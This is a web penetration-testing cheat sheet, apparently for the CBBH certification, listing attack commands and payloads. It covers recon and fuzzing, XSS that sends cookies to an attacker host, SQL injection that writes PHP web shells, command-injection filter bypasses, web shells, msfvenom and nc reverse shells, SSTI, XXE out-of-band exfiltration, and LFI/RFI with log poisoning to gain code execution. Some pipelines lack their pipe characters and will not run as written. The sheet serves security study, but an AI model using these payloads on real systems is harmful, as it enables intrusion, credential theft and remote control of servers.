CBBH

https://github.com/missteek/cpts-quick-references

Web Requests

cURL

Command

Description

curl -s -O inlanefreight.com/index.html

Download file

curl -k https://inlanefreight.com

Skip HTTPS (SSL) certificate validation

curl inlanefreight.com -v

Print full HTTP request/response details

curl -I https://www.inlanefreight.com

Send HEAD request (only prints response headers)

curl -i https://www.inlanefreight.com

Print response headers and response body

curl https://www.inlanefreight.com -A 'Mozilla/5.0'

Set User-Agent header

curl -u admin:admin http://<SERVER_IP>:<PORT>/

Set HTTP basic authorization credentials

curl http://admin:admin@<SERVER_IP>:<PORT>/

Pass HTTP basic authorization credentials in the URL

curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/

Set request header

curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'

Pass GET parameters

curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/

Send POST request with POST data

curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/

Set request cookies

curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php

Send POST request with JSON data

APIs

Command

Description

curl http://<SERVER_IP>:<PORT>/api.php/city/london

Read entry

curl -s http://<SERVER_IP>:<PORT>/api.php/city/ | jq

Read all entries

curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'

Create (add) entry

curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'

Update (modify) entry

curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City

Delete entry

Information Gathering

WHOIS

Command
Description

nslookup <target>

Identify A record for the target domain.

export TARGET="domain.tld"

Assign target to an environment variable.

whois $TARGET

WHOIS lookup for the target.

DNS Enumeration

Command
Description

nslookup $TARGET

Identify the A record for the target domain.

nslookup -query=A $TARGET

Identify the A record for the target domain.

dig <TARGET> @<nameserver/IP>

Identify the A record for the target domain.

dig a $TARGET @<nameserver/IP>

Identify the A record for the target domain.

nslookup -query=PTR <IP>

Identify the PTR record for the target IP address.

dig -x <IP> @<nameserver/IP>

Identify the PTR record for the target IP address.

nslookup -query=ANY $TARGET

Identify ANY records for the target domain.

dig any $TARGET @<nameserver/IP>

Identify ANY records for the target domain.

nslookup -query=TXT $TARGET

Identify the TXT records for the target domain.

dig txt $TARGET @<nameserver/IP>

Identify the TXT records for the target domain.

nslookup -query=MX $TARGET

Identify the MX records for the target domain.

dig mx $TARGET @<nameserver/IP>

Identify the MX records for the target domain.

Passive Subdomain Enumeration

Resource/Command
Description

curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.[]' sort -u

All subdomains for a given domain.

curl -s https://sonar.omnisint.io/tlds/{domain} jq -r '.[]' sort -u

All TLDs found for a given domain.

curl -s https://sonar.omnisint.io/all/{domain} jq -r '.[]' sort -u

All results across all TLDs for a given domain.

curl -s https://sonar.omnisint.io/reverse/{ip} jq -r '.[]' sort -u

Reverse DNS lookup on IP address.

curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} jq -r '.[]' sort -u

Reverse DNS lookup of a CIDR range.

curl -s "https://crt.sh/?q=${TARGET}&output=json" jq -r '.[] "\(.name_value)\n\(.common_name)"' sort -u

Certificate Transparency.

cat sources.txt \| while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done

Searching for subdomains and other information on the sources provided in the source.txt list.

curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

This command fetches JSON-formatted data from crt.sh for example.com (the % is a wildcard), extracts domain names using jq, removes any wildcard prefixes (*.) with sed, and finally sorts and deduplicates the results.

Passive Infrastructure Identification

Resource/Command
Description

waybackurls -dates https://$TARGET > waybackurls.txt

Crawling URLs from a domain with the date it was obtained.

Active Infrastructure Identification

Resource/Command
Description

curl -I "http://${TARGET}"

Display HTTP headers of the target webserver.

whatweb -a https://www.facebook.com -v

Technology identification.

wafw00f -v https://$TARGET

WAF Fingerprinting.

cat subdomain.list aquatone -out ./aquatone -screenshot-timeout 1000

Makes screenshots of all subdomains in the

subdomain.list.

Active Subdomain Enumeration

Resource/Command
Description

nslookup -type=any -query=AXFR $TARGET nameserver.target.domain

Zone Transfer using Nslookup against the target domain and its nameserver.

gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"

Bruteforcing subdomains.

Virtual Hosts

Resource/Command
Description

curl -s http://192.168.10.10 -H "Host: randomtarget.com"

Changing the HOST HTTP header to request a specific domain.

cat ./vhosts.list while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://<IP address> -H "HOST: ${vhost}.target.domain" | grep "Content-Length: ";done

Bruteforcing for possible virtual hosts on the target domain.

ffuf -w ./vhosts -u http://<IP address> -H "HOST: FUZZ.target.domain" -fs 612

Bruteforcing for possible virtual hosts on the target domain using ffuf.

gobuster vhost -u http://192.0.2.1 -w hostnames.txt

Crawling

Resource/Command
Description

ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

Discovering files and folders that cannot be spotted by browsing the website.

ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS

Mutated bruteforcing against the target web server.

Here's a basic Scrapy spider example to extract links from example.com:

import scrapy

class ExampleSpider(scrapy.Spider):
    name = "example"
    start_urls = ['http://example.com/']

    def parse(self, response):
        for link in response.css('a::attr(href)').getall():
            if any(link.endswith(ext) for ext in self.interesting_extensions):
                yield {"file": link}
            elif not link.startswith("#") and not link.startswith("mailto:"):
                yield response.follow(link, callback=self.parse)
jq -r '.[] | select(.file != null) | .file' example_data.json | sort -u

Attacking Web Applications with Ffuf

Command

Description

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ

Directory Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ

Extension Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php

Page Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

Recursive Fuzzing

ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/

Subdomain Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx

VHost Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx

Parameter Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx

Parameter Fuzzing

ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx

Value Fuzzing

Wordlists

Command

Description

/opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

Directory Wordlist

/opt/useful/seclists/Discovery/Web-Content/web-extensions.txt

Extensions Wordlist

/opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt

Domain Wordlist

/opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt

Parameters Wordlist

Misc

Command

Description

sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'

Add DNS entry

for i in $(seq 1 1000); do echo $i >> ids.txt; done

Create Sequence Wordlist

JavaScript Deobfuscation

Website

Description

Minify JS code

Cross-Site Scripting (XSS)

Code
Description

<script>alert(window.origin)</script>

Basic XSS Payload

<plaintext>

Basic XSS Payload

<script>print()</script>

Basic XSS Payload

<img src="" onerror=alert(window.origin)>

HTML-based XSS Payload

<script>document.body.style.background = "#141d2b"</script>

Change Background Color

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Change Background Image

<script>document.title = 'HackTheBox Academy'</script>

Change Website Title

<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>

Overwrite website's main body

<script>document.getElementById('urlform').remove();</script>

Remove certain HTML element

<script src="http://OUR_IP/script.js"></script>

Load remote script

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Send Cookie details to us

python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

Run xsstrike on a url parameter

SQL Injection

MySQL

Command

Description

General

mysql -u root -h docker.hackthebox.eu -P 3306 -p

login to mysql database

SHOW DATABASES

List available databases

USE users

Switch to database

Tables

CREATE TABLE logins (id INT, ...)

Add a new table

SHOW TABLES

List available tables in current database

DESCRIBE logins

Show table properties and columns

INSERT INTO table_name VALUES (value_1,..)

Add values to table

INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)

Add values to specific columns in a table

UPDATE table_name SET column1=newvalue1, ... WHERE <condition>

Update table values

Columns

SELECT * FROM table_name

Show all columns in a table

SELECT column1, column2 FROM table_name

Show specific columns in a table

DROP TABLE logins

Delete a table

ALTER TABLE logins ADD newColumn INT

Add new column

ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn

Rename column

ALTER TABLE logins MODIFY oldColumn DATE

Change column datatype

ALTER TABLE logins DROP oldColumn

Delete column

Output

SELECT * FROM logins ORDER BY column_1

Sort by column

SELECT * FROM logins ORDER BY column_1 DESC

Sort by column in descending order

SELECT * FROM logins ORDER BY column_1 DESC, id ASC

Sort by two-columns

SELECT * FROM logins LIMIT 2

Only show first two results

SELECT * FROM logins LIMIT 1, 2

Only show first two results starting from index 2

SELECT * FROM table_name WHERE <condition>

List results that meet a condition

SELECT * FROM logins WHERE username LIKE 'admin%'

List results where the name is similar to a given string

MySQL Operator Precedence

  • Division (/), Multiplication (*), and Modulus (%)

  • Addition (+) and Subtraction (-)

  • Comparison (=, >, <, <=, >=, !=, LIKE)

  • NOT (!)

  • AND (&&)

  • OR (||)

SQL Injection

Payload

Description

Auth Bypass

admin' or '1'='1

Basic Auth Bypass

admin')-- -

Basic Auth Bypass With comments

Union Injection

' order by 1-- -

Detect number of columns using order by

cn' UNION select 1,2,3-- -

Detect number of columns using Union injection

cn' UNION select 1,@@version,3,4-- -

Basic Union injection

UNION select username, 2, 3, 4 from passwords-- -

Union injection for 4 columns

DB Enumeration

SELECT @@version

Fingerprint MySQL with query output

SELECT SLEEP(5)

Fingerprint MySQL with no output

cn' UNION select 1,database(),2,3-- -

Current database name

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

List all databases

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

List all tables in a specific database

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

List all columns in a specific table

cn' UNION select 1, username, password, 4 from dev.credentials-- -

Dump data from a table in another database

Privileges

cn' UNION SELECT 1, user(), 3, 4-- -

Find current user

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

Find if user has admin privileges

cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

Find if all user privileges

cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Find which directories can be accessed through MySQL

File Injection

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Read local file

select 'file written successfully!' into outfile '/var/www/html/proof.txt'

Write a string to a local file

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

Write a web shell into the base web directory

SQLMap

Command

Description

sqlmap -hh

View the advanced help menu

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Run SQLMap without asking for user input

sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

SQLMap with POST request

sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

POST request specifying an injection point with an asterisk

sqlmap -r req.txt

Passing an HTTP request file to SQLMap

sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

Specifying a cookie header

sqlmap -u www.target.com --data='id=1' --method PUT

Specifying a PUT request

sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt

Store traffic to an output file

sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch

Specify verbosity level

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Specifying a prefix or suffix

sqlmap -u www.example.com/?id=1 -v 3 --level=5

Specifying the level and risk

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Basic DB enumeration

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb

Table enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

Table/row enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

Conditional enumeration

sqlmap -u "http://www.example.com/?id=1" --schema

Database schema enumeration

sqlmap -u "http://www.example.com/?id=1" --search -T user

Searching for data

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Password enumeration and cracking

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Anti-CSRF token bypass

sqlmap --list-tampers

List all tamper scripts

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

Check for DBA privileges

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Reading a local file

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

Writing a file

sqlmap -u "http://www.example.com/?id=1" --os-shell

Spawning an OS shell

Command Injections

Injection Operators

Injection Operator

Injection Character

URL-Encoded Character

Executed Command

Semicolon

;

%3b

Both

New Line

%0a

Both

Background

&

%26

Both (second output generally shown first)

Pipe

|

%7c

Both (only second output is shown)

AND

&&

%26%26

Both (only if first succeeds)

OR

||

%7c%7c

Second (only if first fails)

Sub-Shell

``

%60%60

Both (Linux-only)

Sub-Shell

$()

%24%28%29

Both (Linux-only)


Linux

Filtered Character Bypass

Code
Description

printenv

Can be used to view all environment variables

Spaces

%09

Using tabs instead of spaces

${IFS}

Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())

{ls,-la}

Commas will be replaced with spaces

Other Characters

${PATH:0:1}

Will be replaced with /

${LS_COLORS:10:1}

Will be replaced with ;

$(tr '!-}' '"-~'<<<[)

Shift character by one ([ -> \)


Blacklisted Command Bypass

Code
Description

Character Insertion

' or "

Total must be even

$@ or \

Linux only

Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

Execute command regardless of cases

$(a="WhOaMi";printf %s "${a,,}")

Another variation of the technique

Reversed Commands

echo 'whoami' | rev

Reverse a string

$(rev<<<'imaohw')

Execute reversed command

Encoded Commands

echo -n 'cat /etc/passwd | grep 33' | base64

Encode a string with base64

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Execute b64 encoded string

Windows

Filtered Character Bypass

Code
Description

Get-ChildItem Env:

Can be used to view all environment variables - (PowerShell)

Spaces

%09

Using tabs instead of spaces

%PROGRAMFILES:~10,-5%

Will be replaced with a space - (CMD)

$env:PROGRAMFILES[10]

Will be replaced with a space - (PowerShell)

Other Characters

%HOMEPATH:~0,-17%

Will be replaced with \ - (CMD)

$env:HOMEPATH[0]

Will be replaced with \ - (PowerShell)


Blacklisted Command Bypass

Code
Description

Character Insertion

' or "

Total must be even

^

Windows only (CMD)

Case Manipulation

WhoAmi

character with odd cases

Reversed Commands

"whoami"[-1..-20] -join ''

Reverse a string

iex "$('imaohw'[-1..-20] -join '')"

Execute reversed command

Encoded Commands

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))

Encode a string with base64

iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Execute b64 encoded string

Separator Characters

List of injection characters and matching URL encoded as wordlist of possible separators:

;
%3b
\n
%0a
&
%26
|
%7c
&&
%26%26
||
%7c%7c
``
%60%60
$()
%24%28%29

Obfuscated Commands

List of commands obfuscated as wordlist to test possible WAF filter bypass:

uname
u'n'a'm'e
${uname}
$(uname)
{uname}
$(rev<<<'emanu')
bash<<<$(base64 -d<<<dW5hbWUgLWE=)
b'a's'h'<<<$('b'a's'e'6'4 -d<<<dW5hbWUgLWE=)
l's'${IFS}${PATH:0:1}${IFS}-a'l'

Trick : you can use intruder cluster bomb to try all possible cases

File Upload

Character Injection - Before/After Extension to generate list of possible filenames to bypass file upload filters on white or black listings.

for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm'; do
        echo "shell$char$ext.jpg" >> filenames_wordlist.txt
        echo "shell$ext$char.jpg" >> filenames_wordlist.txt
        echo "shell.jpg$char$ext" >> filenames_wordlist.txt
        echo "shell.jpg$ext$char" >> filenames_wordlist.txt
    done
done

Web Shells

Web Shell

Description

<?php file_get_contents('/etc/passwd'); ?>

Basic PHP File Read

<?php system('hostname'); ?>

Basic PHP Command Execution

<?php system($_REQUEST['cmd']); ?>

Basic PHP Web Shell

<% eval request('cmd') %>

Basic ASP Web Shell

msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

Generate PHP reverse shell

PHP Web Shell

PHP Reverse Shell

Seclists Web Shells

Automated reverse shell

Bypasses

Command

Description

Blacklist Bypass

shell.phtml

Uncommon Extension

shell.pHp

Case Manipulation

List of PHP Extensions

List of ASP Extensions

List of Web Extensions

Whitelist Bypass

shell.jpg.php

Double Extension

shell.php.jpg

Reverse Double Extension

%20, %0a, %00, %0d0a, /, .\, ., …

Character Injection - Before/After Extension

Content/Type Bypass

List of Web Content-Types

List of All Content-Types

List of File Signatures/Magic Bytes

Limited Uploads

Potential Attack

File Types

XSS

HTML, JS, SVG, GIF

XXE/SSRF

XML, SVG, PDF, PPT, DOC

DoS

ZIP, JPG, PNG

Login Brute Forcing

hydra [-l LOGIN|-L FILE] [-p PASS|-P FILE] [-C FILE] -m MODULE [service://server[:PORT][/OPT]]
medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh
medusa -h www.example.com -U users.txt -P passwords.txt -M http -m GET
Command
Description

hydra -C wordlist.txt SERVER_IP -s PORT http-get /

Basic Auth Brute Force

hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get /

Basic Auth Brute Force

hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

Login Form Brute Force

hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4

SSH Brute Force

cupp -i

Creating Custom Password Wordlist

sed -ri '/^.{,7}$/d' william.txt

Remove Passwords Shorter Than 8

sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt

Remove Passwords With No Special Chars

sed -ri '/[0-9]+/!d' william.txt

Remove Passwords With No Numbers

./username-anarchy Bill Gates > bill.txt

Generate Usernames List

Server side request forgery SSRF

Protocols

http://127.0.0.1/
file:///etc/passwd
gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmin
Command
Description

curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:8080"

Testing for SSRF vulnerability

curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:9090/index.html"

Retrieving a remote file through the target application (HTTP Schema)

curl -i -s "http://<TARGET IP>/load?q=file:///etc/passwd"

Retrieving a local file through the target application (File Schema)

for port in {1..65535};do echo $port >> ports.txt;done

Generating a wordlist of possible ports

ffuf -w ./ports.txt:PORT -u "http://<TARGET IP>/load?q=http://127.0.0.1:PORT" -fs 30

Fuzzing for ports on the internal interface

curl -i -s "http://<TARGET IP>/load?q=http://127.0.0.1:5000"

Interacting with the internal interface on the discovered port

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html"

Interacting with the internal application

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http://127.0.0.1:1"

Discovering web application listening in on localhost

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:1"

Modifying the URL to bypass the error message

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o -

Requesting to disclose the /proc/self/environ file on the internal application

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///app/internal_local.py"

Retrieving a local file through the target application

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"

Confirming remote code exeuction on the remote host

SSI Injection

SSI Directive Payload Description

Print variables

<!--#printenv -->

Change config

<!--#config errmsg="Error!" -->

Print specific variable

<!--#echo var="DOCUMENT_NAME" var="DATE_LOCAL" -->

Execute command

<!--#exec cmd="whoami" -->

Date

<!--#echo var="DATE_LOCAL" -->

Include web file

<!--#include virtual="index.html" -->

Reverse Shell

<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo /bin/bash 1>/tmp/foo;rm /tmp/foo" -->

SSTI

Command
Description

${{<%[%'"}}%.

Test String

${7*7}

Spring payload

{{_self.env.display("TEST"}}

Twig payload

{{config.items()}}

Jinja2 basic injection

{{ [].class.base.subclasses() }}

Jinja2 dump all classes payload

{% import os %}{{os.system('whoami')}}

Tornado payload

{{7*'7'}}

Confirming Jinja2 backend

./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'

Automating with tplmap

XSLT Injection

<xsl:template>	 # This element indicates an XSL template. It can contain a match attribute that contains a path in the XML-document that the template applies to
<xsl:value-of>	 # This element extracts the value of the XML node specified in the select attribute
<xsl:for-each>	 # This elements enables looping over all XML nodes specified in the select attribute
<xsl:sort>	 # This element specifies the node to sort elements in a for loop by in the select argument. Additionally, a sort order may be specified in the order argument
<xsl:if>	 # This element can be used to test for conditions on a node. The condition is specified in the test argument

# Injection Payloads
# Information Disclosure
<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />
<xsl:value-of select="system-property('xsl:product-name')" />
<xsl:value-of select="system-property('xsl:product-version')" />

# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />

# RCE
<xsl:value-of select="php:function('system','id')" />

XXE

Code

Description

<!ENTITY xxe SYSTEM "http://localhost/email.dtd">

Define External Entity to a URL

<!ENTITY xxe SYSTEM "file:///etc/passwd">

Define External Entity to a file path

<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">

Read PHP source code with base64 encode filter

<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Reading a file through a PHP error

<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

Reading a file OOB exfiltration

File Inclusion

Local File Inclusion LFI

Command

Description

/etc/passwd

Basic LFI

../../../../etc/passwd

LFI with path traversal

....//....//....//....//etc/passwd

Bypass basic path traversal filter

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

Bypass filters with URL encoding

/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

Bypass appended extension with path truncation (obsolete)

../../../../etc/passwd%00

Bypass appended extension with null byte (obsolete)

php://filter/read=convert.base64-encode/resource=config

Read PHP with base64 filter

Remote Code Execution

Command

Description

PHP Wrappers

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

RCE with data wrapper

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"

RCE with input wrapper

http://<SERVER_IP>:/index.php?language=expect://id

RCE with expect wrapper

RFI

echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>

Host web shell

/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

Include remote PHP web shell

LFI + Upload

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

Create malicious image

/index.php?language=./profile_images/shell.gif&cmd=id

RCE with malicious uploaded image

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

Create malicious zip archive 'as jpg'

/index.php?language=zip://shell.zip%23shell.php&cmd=id

RCE with malicious uploaded zip

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

Create malicious phar 'as jpg'

/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id

RCE with malicious uploaded phar

Log Poisoning

/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

Read PHP session parameters

%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

Poison PHP session with web shell

/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id

RCE through poisoned PHP session

curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'

Poison server log

/var/log/apache2/access.log&cmd=id

RCE through poisoned PHP session

C:\xampp\apache\logs\

Apache log files on windows XAMPP

# PHP Wrappers
php://filter/read=string.rot13/resource=index.php
php://filter/convert.iconv.utf-8.utf-16/resource=index.php
php://filter/convert.base64-encode/resource=index.php
pHp://FilTer/convert.base64-encode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=dir
expect://id
expect://ls

Misc

File Inclusion Functions

Function

Read Content

Execute

Remote URL

PHP

include()/include_once()

Yes

Yes

Yes

require()/require_once()

Yes

Yes

No

file_get_contents()

Yes

No

Yes

fopen()/file()

Yes

No

No

NodeJS

fs.readFile()

Yes

No

No

fs.sendFile()

Yes

No

No

res.render()

Yes

Yes

No

Java

include

Yes

No

No

import

Yes

Yes

Yes

.NET

@Html.Partial()

Yes

No

No

@Html.RemotePartial()

Yes

No

Yes

Response.WriteFile()

Yes

No

No

include

Yes

Yes

Yes

Last updated